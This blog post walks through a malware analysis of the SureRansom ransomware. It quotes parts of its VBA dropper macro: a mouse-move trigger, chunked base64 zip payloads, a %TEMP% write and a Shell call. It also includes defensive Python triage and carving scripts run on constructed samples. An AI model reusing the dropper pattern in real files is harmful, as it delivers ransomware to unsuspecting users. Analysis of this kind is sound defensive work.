Analyzing SureRansom - Part 1

21/01/2018 by 0xm4v3rick | updated 24/01/2018

Updated based on some suggestions from Abhay. Thanks to him!!

Hello!! Long time since the last post! Although I don’t have much experience doing malware reverse engineering, I tried my hand at a ransomware sample with my limited skill set in this area. This is the first part of the write-up. Below are my observations and a walk-through of the analysis.

A tweet led me to this ransomware, which was reported to use a bogus two-factor "activation" prompt, with the macro triggered by mouse movement: https://twitter.com/JohnLaTwC/status/952948929628291072
The VBA source and the hashes can be found here, as per the tweet: https://pastebin.com/raw/UL8C6KJj
Files are also available here
Hash: sha256 0acc9adbbdbd6db359552e2919aabc3ca4a42a28b3b7c3d26fb8f0699d23bdc2 payloadv10.exe
The VBA was extracted with oletools, which is pretty good at it, as seen from the pastebin post. So, let's try and analyze it.

The first part of the VBA is an event handler that fires on mouse movement over the label. As soon as the mouse moves it disables the label and the rest of the code runs.

Public Sub Label1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, _
                           ByVal X As Single, ByVal Y As Single)
Label1.Enabled = False

The next part uses ReDim to store the base64-encoded payload. A zip file, when base64-encoded, starts with UEsDBBQAAAAIA (this is the base64 form of the PK zip header). The zip file contains the ransomware exe.
The data10 array holds the encoded data that will be used if the operating system is Windows 10; we will see how the macro finds that out during further analysis. Similarly, separate ransomware binaries are built and encoded for the other OS versions in the variables data81 for Windows 8.1 and data7 for Windows 7.

ReDim data10(0 To 0) As String
data10(UBound(data10)) = "UEsDBBQAAAAIAPNKd0pTxbbEeFoAAAB2AgAOAAAAcGF5bG9hZHYxMC5leGXtXQlglMX1n93NsdlN": ReDim Preserve data10(0 To UBound(data10) + 1) As String
data10(UBound(data10)) = "NtncCSALCIYr5IIkIEfIQaLcCadYu0kWWNlkw+4mkKIttFVrtbb2sH9tvSuI1gOrVitarVK1HpWq": ReDim Preserve data10(0 To UBound(data10) + 1) As String
----snip----
data10(UBound(data10)) = "nDef/wdQSwECFAAUAAAACADzSndKU8W2xHhaAAAAdgIADgAAAAAAAAAAAAAAAAAAAAAAcGF5bG9h": ReDim Preserve data10(0 To UBound(data10) + 1) As String
data10(UBound(data10)) = "ZHYxMC5leGVQSwUGAAAAAAEAAQA8AAAApFoAAAAA": ReDim Preserve data10(0 To UBound(data10) + 1) As String

Next, a few variables are defined for further use.

Set wshShell = CreateObject("WScript.Shell")
Dim result

The code below uses WMI (the WbemScripting and winmgmts COM objects) to gather OS information, which will be used to select the payload as discussed above. The query result is stored in oss.

Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
strComputer = "."
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set oss = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")

The code below takes the OS version value and compares it in a Select Case to determine the appropriate payload. The case with value "10." represents a Windows 10 system. It then retrieves the TEMP directory location and appends payloadv10 to it; this will be the full path of our zip/exe file.

For Each os In oss    
    Dim operatingSystem    
    operatingSystem = os.Version
    operatingSystem = Left(operatingSystem, 3)
    Select Case operatingSystem

    Case "10."
        ' Windows 10
        sourceRoot = wshShell.ExpandEnvironmentStrings("%TEMP%") & "\payloadv10"

Next, the extensions are added. The Base64Save function is called with the arguments data10 and sourceZip. This function takes the encoded data from the data10 array and writes a zip file out of it at the location given by sourceZip, with the exe inside it named as in sourceExe. Check out the Base64Save function from the pastebin link or here.

        sourceZip = sourceRoot & ".zip"
        sourceExe = sourceRoot & ".exe"
        Base64Save data10, sourceZip

destinationFolder holds the TEMP location; the zip file is extracted there via a call to the Unzip function and the exe is launched through Call Shell. Check out the Unzip function from the pastebin link or here.

        destinationFolder = wshShell.ExpandEnvironmentStrings("%TEMP%")
        result = Unzip(sourceZip, destinationFolder)
        Call Shell(sourceExe)

The remaining cases run on the conditions explained above. The VBA code above lives in the ThisDocument module; the Base64Save and Unzip functions are written in a separate module named Module1.
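Pulling the indicators above together: a small triage script, added here as an example (it is not part of the original post and not the macro's own code), that scans VBA source for the combination seen in this dropper: a mouse-move trigger, WScript.Shell, the Win32_OperatingSystem WMI query, %TEMP% expansion, base64 chunks beginning with the zip prefix, the ReDim Preserve chunking idiom and a Shell() call. The weights and the threshold are my own assumptions, and the two macro snippets it runs on are constructed, not the real sample.

```python
import re

# Indicators taken from the dropper walked through above. Weights and the
# threshold are assumptions for this example, not values from the post.
# The base64 prefix is matched case-sensitively via (?-i:...); the rest is
# case-insensitive because VBA keywords and identifiers are.
INDICATORS = [
    ("mouse_move_trigger", r"_MouseMove\s*\(", 2),
    ("wscript_shell",      r'CreateObject\s*\(\s*"WScript\.Shell"', 1),
    ("wmi_os_query",       r"Win32_OperatingSystem", 1),
    ("temp_dir_expansion", r'ExpandEnvironmentStrings\s*\(\s*"%TEMP%"', 1),
    ("base64_zip_chunk",   r'"(?-i:UEsDB)[A-Za-z0-9+/=]*"', 3),
    ("redim_chunking",     r"ReDim Preserve \w+\(0 To UBound\(\w+\) \+ 1\)", 1),
    ("shell_exec",         r"\bShell\s*\(", 2),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE), weight) for name, rx, weight in INDICATORS]
SUSPICIOUS_THRESHOLD = 5  # assumption: several weak signals together are what matters


def triage(vba_source):
    """Count indicator hits and return a weighted score with a coarse verdict."""
    hits = {}
    score = 0
    for name, rx, weight in COMPILED:
        n = len(rx.findall(vba_source))
        if n:
            hits[name] = n
            score += weight
    verdict = "suspicious" if score >= SUSPICIOUS_THRESHOLD else "low"
    return {"hits": hits, "score": score, "verdict": verdict}


# Constructed excerpt mirroring the macro's structure (the chunk is a dummy, not real payload).
SAMPLE_DROPPER = r'''Public Sub Label1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, _
                           ByVal X As Single, ByVal Y As Single)
Label1.Enabled = False
ReDim data10(0 To 0) As String
data10(UBound(data10)) = "UEsDBBQAAAAIAConstructedChunk0000": ReDim Preserve data10(0 To UBound(data10) + 1) As String
Set wshShell = CreateObject("WScript.Shell")
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set oss = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
sourceRoot = wshShell.ExpandEnvironmentStrings("%TEMP%") & "\payloadv10"
Call Shell(sourceExe)
End Sub
'''

# Constructed benign macro for comparison.
SAMPLE_BENIGN = r'''Sub BoldSelection()
    Selection.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        print(label, triage(src))
```

Run against the oletools output for a document, the hit list tells you which of the dropper's building blocks are present; a single hit such as WScript.Shell is common in legitimate macros, which is why the score only turns suspicious when several line up.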

Next, let’s execute the above macro safely and retrieve the ransomware binary for analysis. Note that Call Shell(sourceExe) needs to be commented out with ' to ensure the binary is not run. I have separated out the macro code for Windows 10, which can be used from here. To run the macro we obviously need MS Office and the macro code. The mouse-tracking function has been removed, and some parts have been added or commented for better understanding and safety, as you will see further on. Code for the other operating systems can be prepared from the original macro and run the same way.
You will need to create a module in the macro editor to add the code there. Delete the macro sub created by the editor. The marked code is what was added or commented out, as explained above.
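Rather than running the macro in Office to get at the binary, the three pieces described above (the chunked data10 strings, the Base64Save step and the unzip step) can be reproduced statically. The script below is an added example, not the post's code and not the macro's: it rebuilds each chunked array from the VBA text, base64-decodes it, keeps only blobs that begin with the PK zip header, and lists every archive member with its SHA-256 so the hash can be compared against the one given earlier. The macro text it runs on is constructed here around a dummy stand-in for payloadv10.exe; the chunk-line layout follows the macro, the payload bytes do not.

```python
import base64
import hashlib
import io
import re
import zipfile

# Pattern for the chunk assignments the macro uses to rebuild its payload:
#   data10(UBound(data10)) = "<base64>": ReDim Preserve data10(0 To UBound(data10) + 1) As String
CHUNK_RE = re.compile(
    r'(?P<var>[A-Za-z_]\w*)\(UBound\((?P=var)\)\)\s*=\s*"(?P<chunk>[A-Za-z0-9+/=]*)"'
)
ZIP_MAGIC = b"PK\x03\x04"  # the bytes that the "UEsDB..." base64 prefix decodes to


def extract_chunks(vba_source):
    """Collect the base64 chunks per array variable, in source order."""
    chunks = {}
    for m in CHUNK_RE.finditer(vba_source):
        chunks.setdefault(m.group("var"), []).append(m.group("chunk"))
    return chunks


def carve_payloads(vba_source):
    """Decode every chunked variable; for the ones that are zips, list members with SHA-256 and size."""
    carved = {}
    for var, parts in extract_chunks(vba_source).items():
        try:
            blob = base64.b64decode("".join(parts), validate=True)
        except ValueError:
            continue  # not clean base64, so not one of the payload arrays
        if not blob.startswith(ZIP_MAGIC):
            continue  # decoded fine but is not a zip archive
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            carved[var] = [
                (info.filename, hashlib.sha256(zf.read(info)).hexdigest(), info.file_size)
                for info in zf.infolist()
            ]
    return carved


# --- constructed sample input (a dummy stand-in, not the real payloadv10.exe) ---
FAKE_EXE = b"MZ" + b"\x90" * 64 + b"constructed stand-in for payloadv10.exe"
FAKE_EXE_SHA256 = hashlib.sha256(FAKE_EXE).hexdigest()


def _vba_chunk_lines(var, raw):
    """Emit ReDim/assignment lines in the macro's style for a blob, 76 base64 chars per line."""
    b64 = base64.b64encode(raw).decode("ascii")
    lines = [f"ReDim {var}(0 To 0) As String"]
    for i in range(0, len(b64), 76):
        lines.append(
            f'{var}(UBound({var})) = "{b64[i:i + 76]}": '
            f"ReDim Preserve {var}(0 To UBound({var}) + 1) As String"
        )
    return lines


def build_sample_macro():
    """Constructed macro text: a zip holding the dummy exe in data10, plus a non-zip blob in data7."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("payloadv10.exe", FAKE_EXE)
    lines = [
        "Public Sub Label1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, _",
        "                           ByVal X As Single, ByVal Y As Single)",
        "Label1.Enabled = False",
    ]
    lines += _vba_chunk_lines("data10", buf.getvalue())
    lines += _vba_chunk_lines("data7", b"not a zip archive")
    lines += ['Set wshShell = CreateObject("WScript.Shell")', "End Sub"]
    return "\n".join(lines)


SAMPLE_MACRO = build_sample_macro()

if __name__ == "__main__":
    for var, members in carve_payloads(SAMPLE_MACRO).items():
        for name, digest, size in members:
            print(f"{var}: {name} {size} bytes sha256={digest}")
```

Pointing carve_payloads at the pastebin source instead of SAMPLE_MACRO yields the archives for every OS variant without opening the document in Office at all, and the per-member hash is what you compare with the sha256 listed at the top of the post.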

[screenshot 5]

Next, we run the code. Check the MsgBox, which displays the location of the temp folder where our zip and exe files will be present. Let’s go to that directory and check for the files.

[screenshots 6 and 10]

Now let’s do some static analysis on the obtained exe. First, check the file type: the result shows the executable is a PE32 binary.

[screenshot 7]

Running strings on it gives us a clue that it was built with the .NET Framework and Visual Studio. Also, at the end, we see a folder location left behind, named "SureCloud". So does this have anything to do with the SureCloud company?? No hard proof.

[screenshots 8 and 9]

Next, I went about running the ransomware on an isolated Windows 10 VM without any internet connection to see how it behaves. Upon running, it immediately flashed its screen, trying to lock out the user, with an option to pay £50 for the key.
The algorithm is stated as AES256. At first this was not very convincing to me, since AES is a symmetric-key algorithm and I assumed ransomware generally does not use one. As it turns out, ransomware does use a symmetric algorithm for the files; the symmetric key is then encrypted with a public/private-key scheme. If that is not done, it is highly likely that the key is hardcoded or that no encryption is performed at all. A hardcoded key will exist somewhere in the code and can be recovered; if no encryption is performed, this is just an attempt to scare the victim into paying without much effort. I went ahead and clicked the purchase key option to see what happens and got the error below.

[screenshot 11]

The error is a .NET Framework exception raised while making a web request to the host 138.68.176.166, as shown above. Searching for the IP address on censys.io gives the information below. The system is hosted on Digital Ocean and the results suggest the domain www.competitivebeauty.com is hosted on it via WordPress. This looks like a zombie server, compromised to act as a proxy; probably compromised via WordPress or SSH brute force, as SSH is enabled on it.

[screenshots 1 and 31]

Quitting the error brought me back to my desktop and I was able to work on the VM as usual, which seems strange. It looks like no files were encrypted.
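"Looks like no files were encrypted" is the kind of claim worth checking rather than eyeballing. The snippet below is an added example, not part of the original post: it hashes every file under a directory before and after detonation and reports what was added, removed or rewritten. The demo() run builds a tiny constructed corpus in a temporary directory and then rewrites one file and renames another to imitate what an encryptor would leave behind; a real run would snapshot the VM's test-document folder before and after launching the sample.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Map every file under root (as a path relative to root) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_snapshots(before, after):
    """Report files that appeared, disappeared, or whose content changed between two snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys() if before[p] != after[p]),
    }


def demo():
    """Constructed run: small corpus, then one file rewritten and one renamed, as an encryptor might do."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("a.txt", b"alpha"), ("b.docx", b"bravo"), ("c.jpg", b"charlie")):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        before = snapshot(root)
        # imitate an encryptor: overwrite a.txt and rename b.docx with a new extension
        with open(os.path.join(root, "a.txt"), "wb") as fh:
            fh.write(b"garbage")
        os.rename(os.path.join(root, "b.docx"), os.path.join(root, "b.docx.locked"))
        after = snapshot(root)
        return diff_snapshots(before, after)


if __name__ == "__main__":
    print(demo())
```

An empty report across all three lists after the sample has run is the evidence for "no files were encrypted"; anything in modified or added with a new extension is the file set to look at next.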

That is all for this post. This is all I could gather from a first look at the ransomware. I will try to come up with another post diving deeper into the binary analysis, to improve my reversing skills as well. 😉 If you liked/disliked the post, leave a comment/feedback.

Thanks for dropping by!!!


Tags: malware, vba, macro
